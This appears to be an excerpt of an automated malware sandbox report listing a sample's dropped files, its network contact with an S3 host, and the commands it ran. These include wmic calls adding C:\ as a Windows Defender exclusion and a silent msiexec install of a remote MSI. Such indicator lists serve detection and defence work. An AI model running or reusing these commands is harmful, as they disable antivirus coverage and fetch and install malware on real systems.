Technical Information
- %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\msiwrapper.ini
- %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files.cab
- %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files\$dpx$.tmp\635d40d88617d04c95a2a487f5353cf2.tmp
- from %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files\$dpx$.tmp\635d40d88617d04c95a2a487f5353cf2.tmp to %TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files\xxx.exe
- 'sy######.#3.eu-west-2.amazonaws.com':443
- DNS ASK sy######.#3.eu-west-2.amazonaws.com
- '%TEMP%\mw-5a504534-c929-4e4b-a2a7-f00953ebc166\files\xxx.exe'
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files' (with hidden window)
- '<SYSTEM32>\wbem\wmic.exe' /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\' (with hidden window)
- '<SYSTEM32>\wbem\wmic.exe' /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\
- '<SYSTEM32>\msiexec.exe' /i https://syshelor.s3.eu-west-2.amazonaws.com/sHelpe.msi /qn
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files